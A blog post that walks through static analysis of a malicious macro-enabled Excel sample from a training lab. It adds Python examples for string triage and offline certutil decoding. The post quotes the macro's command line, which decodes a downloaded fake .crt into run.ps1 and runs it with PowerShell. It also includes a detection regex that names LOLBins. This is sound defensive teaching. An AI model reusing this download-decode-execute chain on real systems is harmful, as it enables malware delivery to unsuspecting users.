
Malicious Excel Document - Basic Static Analysis

  • Hacking By Doing
  • Aug 8, 2024
  • 2 min read

In this post, I'll be performing a static analysis on a potentially malicious Excel document.



For this analysis, I'll be using my REMnux machine.

After downloading the sample files from the PMAT labs, I obtained an Excel file named "SheetsForFinancial.xlsm". An .xlsm file is a ZIP archive, so let's unzip it and examine its contents.


Inspecting the extracted contents, one part stands out: xl/vbaProject.bin.

This part is noteworthy because it is the OLE container that holds the workbook's VBA (Visual Basic for Applications) macros. A macro-enabled workbook arriving from outside is a classic delivery mechanism, so the macro code is where the analysis should go next.

To extract strings from vbaProject.bin we can use oledump.py, which opens the .xlsm directly and parses the OLE container inside it. Run without -s, oledump.py lists the streams and marks those containing macro code with an M; here that is stream 3, so we dump its strings with: oledump.py -s 3 -S SheetsForFinancial.xlsm


Among the extracted strings is one that is clearly a command line:

cmd /c certutil -decode encd.crt run.ps1 & c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
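The steps so far (treat the .xlsm as a ZIP, find the VBA part, dump its strings and look for anything suspicious) in one Python script, added here as an example; it is not code from the post or from oledump.py. The workbook it analyses is constructed in memory so the script runs offline: the vbaProject.bin inside it is a stand-in blob with planted strings (the command line and hostname from the post), not a real OLE container, and the indicator list is an illustrative assumption rather than anything the post provides.

```python
"""Triage an .xlsm for embedded VBA and suspicious strings (added example).

Opens the workbook as a ZIP, looks for the vbaProject.bin part, pulls ASCII
and UTF-16LE strings out of it (what oledump.py -S does) and flags strings
that name living-off-the-land binaries, hostnames or auto-run macro entry
points. The sample workbook is constructed; its VBA part is a stand-in blob.
"""
import io
import re
import zipfile
from typing import Dict, List

# Indicators worth flagging in macro strings (assumption: an illustrative
# list, not an exhaustive one).
SUSPICIOUS = re.compile(
    r"(certutil|powershell|cmd\s*/c|wscript|mshta|rundll32|regsvr32|bitsadmin"
    r"|https?://|\b[\w-]+(?:\.[\w-]+)*\.(?:local|com|net|org)\b"
    r"|auto_open|workbook_open|document_open)",
    re.IGNORECASE,
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")           # 6+ printable ASCII bytes
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")    # 6+ UTF-16LE characters


def build_sample_workbook() -> bytes:
    """Constructed sample input: a minimal .xlsm-shaped ZIP with a fake VBA part."""
    planted_vba = (
        b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"            # OLE magic, for looks only
        + b"\x00" * 24
        + b"Sub Auto_Open()" + b"\x00" * 4
        + b"cmd /c certutil -decode encd.crt run.ps1 & "
          b"c:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
        + b"\x00" * 8
        + "serv3.wonderballfinancial.local".encode("utf-16le")  # a wide string
        + b"\x00" * 8
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        zf.writestr("xl/vbaProject.bin", planted_vba)
    return buf.getvalue()


def list_parts(doc: bytes) -> List[str]:
    """An OOXML document is a ZIP; these are its parts, as `unzip -l` shows them."""
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        return zf.namelist()


def find_vba_parts(doc: bytes) -> List[str]:
    """Excel keeps macros in xl/vbaProject.bin (Word: word/vbaProject.bin)."""
    return [n for n in list_parts(doc) if n.lower().endswith("vbaproject.bin")]


def extract_strings(blob: bytes) -> List[str]:
    """ASCII runs plus UTF-16LE runs, the two encodings OLE and VBA use for text."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    found += [m.group().decode("utf-16le") for m in WIDE_RUN.finditer(blob)]
    return found


def flag_suspicious(strings: List[str]) -> List[str]:
    """Keep only the strings that hit one of the indicator patterns."""
    return [s for s in strings if SUSPICIOUS.search(s)]


def triage(doc: bytes) -> Dict[str, List[str]]:
    """Return the VBA parts found, every string pulled from them, and the flagged subset."""
    report: Dict[str, List[str]] = {
        "vba_parts": find_vba_parts(doc), "strings": [], "flagged": []
    }
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        for part in report["vba_parts"]:
            strings = extract_strings(zf.read(part))
            report["strings"] += strings
            report["flagged"] += flag_suspicious(strings)
    return report


if __name__ == "__main__":
    result = triage(build_sample_workbook())
    print("VBA parts:", result["vba_parts"])
    for s in result["flagged"]:
        print("FLAGGED:", s)
```

Running it prints the VBA part and the flagged strings. Note the UTF-16LE pass: OLE and VBA store much of their text as wide strings, which an ASCII-only strings tool misses; oledump.py -S reports both, and so does this script.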

To investigate further, we need to see the actual VBA source of the macro. The macro stream is stored compressed, so we use oledump.py to decompress and print it: oledump.py -s 3 --vbadecompresscorrupt SheetsForFinancial.xlsm (the usual option is -v; --vbadecompresscorrupt also tolerates a damaged compressed stream).



This gives the full source of the macro.

The macro contains a function that assembles a string by picking characters out of an array, a cheap obfuscation that keeps the assembled value out of a plain strings dump.

It also creates an HTTP request object, so the macro intends to fetch something over HTTP.

The code contains several Base64-encoded strings and requests a URL on serv3.wonderballfinancial.local whose path ends in a .crt file.

The response is written to disk as encd.crt, and the macro then uses a shell object to run the cmd command line seen in the strings output.

That command line decodes encd.crt with certutil -decode, which strips the certificate armor lines and Base64-decodes the rest, producing run.ps1; the .crt extension is a disguise, since the file is Base64 text rather than a certificate.

Finally, it launches PowerShell (the 32-bit build under SysWOW64) to execute run.ps1.
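The last three steps in working code, as an added example (not the post's or the macro's code): emulate certutil -decode in Python so that encd.crt can be turned back into run.ps1 on the REMnux box without ever running a Windows LOLBin, and pull the input and output file names out of a certutil command line like the one in the strings dump. The encd.crt is constructed around a harmless one-line stand-in for run.ps1, since the post does not show the real script; the BEGIN/END CERTIFICATE armor is what certutil -encode writes and what -decode ignores.

```python
"""Recover run.ps1 from encd.crt offline, the way certutil -decode would (added example).

certutil -decode reads a text file, ignores the -----BEGIN/-----END armor
lines that certutil -encode emits, skips whitespace and Base64-decodes the
rest, so a .crt produced this way is just a Base64-wrapped script with a
misleading extension. The encd.crt built here is constructed: it wraps a
harmless stand-in for run.ps1, because the post does not show the real script.
"""
import base64
import re
from typing import Optional, Tuple

# Constructed stand-in for the downloaded script; the real run.ps1 is not shown in the post.
STANDIN_RUN_PS1 = "Write-Host 'stand-in for run.ps1'\r\n"

ARMOR_BEGIN = "-----BEGIN CERTIFICATE-----"
ARMOR_END = "-----END CERTIFICATE-----"

# Matches "certutil -decode <in> <out>" inside a larger command line.
CERTUTIL_DECODE = re.compile(
    r"certutil(?:\.exe)?\s+-decode\s+(\S+)\s+(\S+)", re.IGNORECASE
)


def certutil_encode(data: bytes, width: int = 64) -> str:
    """What `certutil -encode in out` writes: armor lines around 64-column Base64."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "\r\n".join([ARMOR_BEGIN, *lines, ARMOR_END]) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """What `certutil -decode in out` does: drop armor lines and whitespace, Base64-decode.

    Works for plain Base64 files too, since those have no armor lines to drop.
    """
    body = "".join(
        line.strip()
        for line in text.splitlines()
        if not line.lstrip().startswith("-----")
    )
    return base64.b64decode(body, validate=True)


def parse_certutil_decode(command: str) -> Optional[Tuple[str, str]]:
    """Return (encoded_file, decoded_file) from a certutil -decode command line, or None."""
    m = CERTUTIL_DECODE.search(command)
    return (m.group(1), m.group(2)) if m else None


def build_sample_encd_crt() -> str:
    """Constructed encd.crt: the stand-in script wrapped the way certutil -encode would."""
    return certutil_encode(STANDIN_RUN_PS1.encode("utf-8"))


def recover_script(crt_text: str) -> str:
    """Decode a downloaded .crt back into the PowerShell source it hides."""
    return certutil_decode(crt_text).decode("utf-8")


if __name__ == "__main__":
    cmd = ("cmd /c certutil -decode encd.crt run.ps1 & "
           "c:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")
    print("certutil stage:", parse_certutil_decode(cmd))
    print("recovered run.ps1:", recover_script(build_sample_encd_crt()).strip())
```

The point of doing this in Python rather than with certutil on a Windows box is that the decoded run.ps1 lands in a file you can read and hash without any chance of executing it; the same function also handles a .crt that carries bare Base64 with no armor lines.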


In conclusion, if this document is opened and its macros are allowed to run, the macro downloads a file from serv3.wonderballfinancial.local, decodes it with certutil into run.ps1, and executes run.ps1 with PowerShell.

That script is the real payload and is not analysed in this post; it is likely some form of malware, possibly a RAT (Remote Access Trojan).

Thank you for reading. I hope this analysis was helpful!